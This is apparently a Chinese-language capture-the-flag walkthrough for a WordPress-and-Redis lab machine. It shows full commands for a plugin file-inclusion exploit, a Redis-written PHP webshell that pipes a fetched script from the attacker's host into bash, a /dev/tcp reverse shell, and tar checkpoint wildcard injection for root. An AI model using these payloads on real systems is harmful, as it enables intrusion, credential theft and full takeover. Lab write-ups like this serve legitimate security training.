主要知识点:
- Wpscan
- Redis+本地文件包含 创建reverse shell
- tar 命令提权
- redis路径知识
具体步骤
Execute nmap -p- -sV -A #remote_ip#
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-17 23:00 UTC
Nmap scan report for #remote_ip#
Host is up (0.00053s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_ 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-generator: WordPress 5.7.2
|_http-title: Readys – Just another WordPress site
6379/tcp open redis Redis key-value store
发现值得注意的地方:
- 80端口开放,安装了wordpress
- 6379端口开放,安装了redis
执行wpscan,如果本地使用了代理,则需要添加--proxy参数,指定 --plugins-detection 模式,为了得到更准确的插件列表
wpscan --url http://#remote_ip#/ --api-token #api_key# --proxy socks5://#proxy_ip# -e --plugins-detection aggressive
发现 site-editor 1.1.1插件具有LFI vulnerability
[+] site-editor
| Location: http://192.168.210.166/wp-content/plugins/site-editor/
| Latest Version: 1.1.1 (up to date)
| Last Updated: 2017-05-02T23:34:00.000Z
| Readme: http://192.168.210.166/wp-content/plugins/site-editor/readme.txt
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.210.166/wp-content/plugins/site-editor/, status: 200
|
| [!] 1 vulnerability identified:
|
| [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
| References:
| - https://wpscan.com/vulnerability/4432ecea-2b01-4d5c-9557-352042a57e44
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7422
| - https://seclists.org/fulldisclosure/2018/Mar/40
| - https://github.com/SiteEditor/editor/issues/2
|
| Version: 1.1.1 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.210.166/wp-content/plugins/site-editor/readme.txt
Google相关CVE-2018-7422 poc, 得知 调用一下url,可以利用vulnerability
http://#remote_ip#/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
将/etc/passwd替换成 /var/www/html/wp-config.php ,/etc/shadow,/home/alice/.ssh/id_rsa等文件,全部失败,暂时放弃
将注意力放在redis上,尝试不同config文件路径,最终发现 /etc/redis/redis.conf可以被读取,并得到redis 密码
利用redis-cli连接对应redis server,加上slaveof no one避免修改记录时报READONLY相关错误
redis-cli -h #remote_ip# -p 6379 -a "Ready4Redis?" slaveof no one
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
OK
redis-cli -h #remote_ip# -p 6379
192.168.241.166:6379>
在redis-cli中尝试对/var/www/html等路径进行set,save操作时,发现报错,需要寻找有其他有权限写入的路径,尝试继续利用LFI漏洞读取 更多的文件,发现 /etc/systemd/system/redis.service 中redis具备写权限的路径为/opt/redis-files/
尝试建立reverse shell,尝试多种方式后,下面的代码成功创建了reverse shell
- 在本地创建poc.sh
#!/bin/bash
/bin/bash -i >& /dev/tcp/#local_ip#/9000 0>&1
- nc命令监听9000端口
nc -nlvp 9000
- 启动python server
python -m http.server 80
- 利用redis-cli创建reverse shell,它会调用local machine的python 服务器,拿回poc.sh并执行
#remote_ip#:6379> config set dir /opt/redis-files
OK
#remote_ip#:6379> config set dbfilename test.php
OK
#remote_ip#:6379> set test "<?php system('curl #local_ip#/poc.sh | bash'); ?>"
OK
#remote_ip#:6379> save
OK
192.168.241.166:6379>
- 在浏览器端访问如下地址,触发reverse shell
http://#remote_ip#/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/opt/redis-files/test.php
将linpeas.sh上传到remote server,并执行,发现如下shell利用了tar命令来定期备份/var/www/html路径下的文件
*/3 * * * * root /usr/local/bin/backup.sh
-rwxr-xr-x 1 root root 122 Nov 17 2021 /usr/local/bin/backup.sh
#!/bin/bash
cd /var/www/html
if [ $(find . -type f -mmin -3 | wc -l) -gt 0 ]; then
tar -cf /opt/backups/website.tar *
fi
尝试利用tar命令检查点功能 在备份的时候外挂自定义命令
在/var/www/html路径下执行如下命令,当tar命令被用于备份/var/www/html路径下文件时,exploit.sh会被执行,赋予/bin/bash suid的权限
echo "chmod +s /bin/bash" >exploit.sh
touch ./"--checkpoint=1"
touch ./"--checkpoint-action=exec=bash exploit.sh"
等几分钟后,执行 root权限获取到
alice@readys:/var/www/html$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
alice@readys: /bin/bash -p
/bin/bash -p
id
uid=1000(alice) gid=1000(alice) euid=0(root) egid=0(root) groups=0(root),1000(alice)
ls /root
proof.txt
cat /root/proof.txt
892f38a3df377fc50592924a41f10f64